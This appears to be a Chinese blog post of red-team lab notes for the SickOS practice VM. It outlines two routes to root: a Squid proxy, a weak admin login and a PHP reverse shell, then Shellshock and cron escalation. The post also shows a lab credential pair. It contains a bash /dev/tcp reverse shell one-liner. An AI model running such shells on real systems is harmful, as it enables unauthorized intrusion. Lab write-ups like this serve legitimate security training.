第三篇红队笔记-百靶精讲之SickOS

最新推荐文章于 2024-07-17 17:02:24 发布
最新推荐文章于 2024-07-17 17:02:24 发布
阅读量205 收藏
点赞数 2
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/admin741admin/article/details/128494011
版权

方法1

开始

主机发现

在这里插入图片描述

nmap扫描及思路分析

在这里插入图片描述

Squid代理分析与设置

  • 直接访问失败,结合nmap的-sV版本探索,得出应该是代理服务器(百度Squid 3128 确实是代理服务器)
    在这里插入图片描述

Web渗透

  • 目录遍历
    在这里插入图片描述

    在这里插入图片描述
  • 可以账号爆破,得admin admin账号密码
    在这里插入图片描述

获得系统初始Shell

  • 反弹shell
    在这里插入图片描述
    <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.30/7777 0>&1'");?>
    在这里插入图片描述

提权到SickOS账户

  • mysql配置文件config.php
    在这里插入图片描述
  • 尝试mysql用户密码 sickos john@123
    在这里插入图片描述

进一步提权

在这里插入图片描述

rooted

在这里插入图片描述

方法2

Nikto扫描

在这里插入图片描述

Shellshock漏洞原理

Shellshock验证

在这里插入图片描述

Shellshock获取初始系统shell

在这里插入图片描述
在这里插入图片描述

  • python -c “import pty;pty.spawn(‘/bin/bash’)”
    在这里插入图片描述

Cron自动任务提权

在这里插入图片描述

rooted

在这里插入图片描述

zgcadmin
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【网络安全】资产记录工具 Hacker Asset Logger 安装使用详细教程
等风来
07-15 151
在对某一应用程序的多个页面、对多个相关联的应用程序进行渗透测试的过程中,多个请求包的参数、功能之间可能存在一定的联系。例如,在A页面触发的请求包中,通过UID可获取CustomerID;在B页面触发的请求包中,CustomerID用于Cookie身份鉴定、获取用户敏感信息、获取用户订单号OrderNo;在C页面触发的请求包中,OrderNo用于获取对应用户的敏感信息,如姓名、电话、地址、身份证。
Goby红队版-win-x64-2.4.7版本
07-27
Goby红队专版:集成1500个poc和exp ,覆盖普通版本所有功能,开箱即用 使用方式: 解压后双击goby.exe运行即可 注意事项: 最新的漏洞不可以在线更新,可自行添加poc和exp 重要的事情说三遍 不要用于非法或未授权...
红队渗透打点工具-FindUpload
03-07
红队渗透打点工具-FindUpload】 在网络安全领域,红队渗透测试是模拟黑客攻击行为,以评估组织防御能力的一种重要方法。FindUpload作为一款红队打点工具,其核心功能在于帮助渗透测试专家有效地查找和定位网络...
goby红队&社区版-win-64-2.4.7
11-27
《Goby红队与社区版:安全扫描与漏洞检测的利器》 在网络安全领域,漏洞扫描和安全测试是至关重要的环节。Goby是一款备受瞩目的工具,它为红队(网络安全攻防演练中的攻击方)和社区用户提供了一流的支持。"goby...
goby红队-x64-2.4.8(win和linux)
05-16
内涵win-linux goby的安全工具 Goby 是一款基于客户端的安全漏洞扫描工具,适用于红队、蓝队或者渗透测试的场景。与同类产品相比,其主要...总体来说,Goby 红队版是一款非常适合红队操作者使用的高效率安全工具,它
【网络安全】基于PHP study的DVWA靶场搭建教程
等风来
07-14 473
接着访问:http://127.0.0.1/dvwa-master,拉到页面最下面点击Create/Reset Databse 跳转至该页面后,输入admin、password即可登录:
网络安全-网络安全及其防护措施8
LS_Ai的博客
07-17 926
数据中心网络架构是指数据中心内部网络的设计和结构,其目的是提供高性能、高可用性和高扩展性的网络连接。合理的数据中心网络架构能够支持大规模数据处理和传输,满足数据中心的业务需求,提高整体运营效率。负载均衡是一种分配网络流量和计算任务的方法,旨在优化资源利用率、提高系统性能和增强服务可用性。通过将请求分配到多个服务器上,负载均衡避免了单点故障和性能瓶颈,确保系统稳定和高效运行。网络安全策略是指为保护网络和信息系统的安全而制定的一系列规则和措施。
网络安全法律框架更新:最新合规要求与企业应对策略
2301_79955948的博客
07-14 934
首先,企业应提升网络安全意识,完善责任制度,并关注新法律法规的协调衔接。2022年,《网络安全法》迎来了首次修改,这一修订主要是为了与《数据安全法》和《个人信息保护法》等新实施的法律进行衔接协调,完善法律责任制度,进一步保障网络安全。新规定对原有的触发条件进行了优化,例如,关键信息基础设施运营者向境外提供个人信息或重要数据,以及特定数量的个人信息或敏感个人信息的跨境传输,都需要进行安全评估。通过上述措施,企业不仅能够提升自身的网络安全防护能力,还能促进国内网络安全产业的高质量发展,为国家网络安全贡献力量。
等保测评助力网络安全治理现代化
waitaikong_的博客
07-14 356
等保测评,即信息安全等级保护测评,是依据国家相关法律法规和标准,对信息系统进行安全等级划分和安全性能评估的过程。它涵盖了从技术到管理、从人员到流程的多维度评估,旨在确保信息系统在面对各种威胁时的安全性和可靠性。随着网络技术的发展和网络安全形势的变化,等保测评在网络安全治理现代化中扮演着越来越重要的角色。
网络安全-网络安全及其防护措施1
LS_Ai的博客
07-14 1016
网络安全是指保护网络系统及其数据免受未经授权的访问、使用、修改或破坏的过程。它包括对硬件、软件、数据和通信的全面保护,确保系统的机密性、完整性和可用性。网络安全涉及一系列的策略、技术和流程,用于保护网络和数据免受攻击、损失或未经授权的访问。机密性:确保信息只被授权人员访问和查看。完整性:保证信息的准确和完整,防止未经授权的修改。可用性:确保系统和数据在需要时可被合法用户访问。
网络安全防御【防火墙NAT智能选举综合实验】
miss_copper的博客
07-13 1362
需要新创建一个源地址转池:这里我们将配置黑洞路由勾选(防止路由环路,还可以引入到OSPF等动态路由协议中发布出去),允许端口地址转换取消勾选(因为我们这里是多对多的NAT,源NAT地址转换,如果勾选了端口地址转换,就成了端口映射,成了目标NAT)这种方式可以提高安全性,因为攻击者无法预测目标设备的确切IP地址。首先修改公网client5,和分公司server5和client6的域名服务器地址,并且公网中的server4(NDS服务器)开启DNS服务,和分公司的server5开启http服务器。
网络安全-网络安全及其防护措施6
LS_Ai的博客
07-16 818
访问控制列表(ACL)是一种网络安全机制,用于控制网络设备上的数据包流量。通过ACL,可以定义允许或拒绝的流量,增强网络的安全性和管理效率。ACL通过在路由器或交换机上设置规则,确定哪些流量可以通过,哪些流量应该被阻止。入侵检测系统(IDS)定义:监控网络流量和系统活动,检测和记录潜在的安全威胁和攻击行为。IDS提供告警信息,但不主动阻止攻击。作用:检测并报警,但不干预攻击,主要用于识别潜在的安全问题和攻击模式。入侵防御系统(IPS)定义:在IDS的基础上,进一步采取措施阻止攻击行为,保护网络安全
【网络安全】PostMessage:分析JS实现XSS
最新发布
等风来
07-17 635
PostMessage是一个用于在网页间安全地发送消息的浏览器 API。它允许不同的窗口(例如,来自同一域名下的不同页面或者不同域名下的跨域页面)进行通信,而无需通过服务器。通常情况下,它用于实现跨文档消息传递(Cross-Document Messaging),这在一些复杂的网页应用和浏览器插件中非常有用。
WAAP:Web应用程序与API保护的重要性,在网络安全上有什么作用
dexunyun的博客
07-14 601
WAAP通过多层防护机制,为Web应用程序和API提供全面的安全防护。相较于传统的应用程序安全解决方案,德迅云安全WAAP全站防护是基于风险管理和WAAP理念打造的安全方案,以“体系化主动安全” 取代安全产品的简单叠加,为各类Web、API业务等防御来自网络层和应用层的攻击,帮助企业全面提升Web安全水位和安全运营效率。通过全站防护管理平台,对网络L3-L7层各防护模块的安全策略进行统一管理,并通过数据聚合、情报协同,形成真正的纵深防护,简化运营工作的同时进一步提升整体安全的防护水位。
【网络文明】关注网络安全
Liang_z_的博客
07-13 987
网络安全是指保护网络系统的硬件、软件及其存储、传输的数据不被非法访问、篡改、泄露或破坏的过程。这包括了保护个人电脑、智能手机、服务器、网络基础设施等设备的安全,确保电子通信的私密性、完整性和可用性。网络安全是一项系统工程,涉及政府、企业、社会组织和每个个体。在享受互联网带来的便利的同时,我们每个人都应承担起维护网络安全的责任。通过持续的学习、实践和合作,构建一个更加安全、可信的网络环境,让科技真正造福人类社会。程序员作为数字时代的建设者,我们的每一行代码都承载着责任与使命。
自学黑客(网络安全
热门推荐
xv7676的博客
07-13 1万+
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
“萝卜快跑”仍然存在出现多处高危网络安全问题
Sunspot
07-14 1075
目前武汉已经实现全覆盖,由百度推出的无人驾驶技"萝卜快跑"_无人驾驶汽车,便宜又好使用,不超速,不绕路,只要在手机上下单,一键直达目的地缺点:情绪十分稳定,遇到堵车无法通过大数据定位转弯绕路,太死板。
web安全及内网安全知识
wuwenshequ的博客
07-09 1019
web安全和内网安全的知识总结,和文章推荐。这方面网上资料很多,于是小编就整合在了一起方便自己查看阅读
网络安全-网络设备及其配置2
LS_Ai的博客
07-13 752
双绞线:常见于局域网,分为非屏蔽(UTP)和屏蔽(STP)两种类型,适用于不同的干扰环境。光纤:用于高速和长距离传输,分为单模光纤和多模光纤,分别适用于长距离和短距离通信。同轴电缆:用于有线电视和早期以太网连接,具有良好的抗干扰能力和长距离传输能力。无线路由器:集成路由器和无线接入点功能,适用于家庭和小型办公网络,提供无线网络接入和基本的网络管理功能。无线接入点(WAP):独立的无线设备,用于扩展现有有线网络的无线覆盖,适用于大型办公室和公共场所等需要更广泛无线覆盖的环境。负载均衡器。
红队视角:渗透测试实战第三版翻译
"[翻译] 渗透测试实战第三版(红队版) 是一本关于网络安全的书籍,专注于红队在红蓝对抗中的视角和技术。内容涵盖从OSI七层模型到社会工程学攻击的全面渗透测试策略。作者强调在防御措施完善时,社会工程学作为第八层...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值